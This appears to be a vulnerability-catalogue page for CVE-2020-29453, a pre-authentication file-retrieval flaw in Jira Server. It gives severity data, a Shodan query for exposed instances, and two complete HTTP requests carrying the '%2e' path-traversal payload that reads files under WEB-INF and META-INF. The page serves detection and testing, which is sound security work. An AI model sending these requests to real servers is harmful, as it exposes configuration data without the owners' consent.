🔙 목록으로 돌아가기

CVE-2020-29453: Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)

TitleJira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)
Authordwisiswant0
SeverityMedium
ImpactAn attacker can retrieve sensitive files containing configuration information, potentially leading to further exploitation or unauthorized access.
RemediationApply the necessary patches or updates provided by Atlassian to fix the vulnerability.
CVSS Score5.3
EPSS Score0.80006
CVE IDCVE-2020-29453
CWE IDCWE-22
Shodan Queryhttp.component:"Atlassian Jira"http.component:"atlassian jira"
Tags cve cve2020 atlassian jira lfi intrusive vuln

🔍 Vulnerability Description

The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.

🌐 HTTP Request

GET /s/38FTZQwYv5vyRuoUFPeN9GOavIg/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /s/38FTZQwYv5vyRuoUFPeN9GOavIg/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29453.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-29453.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A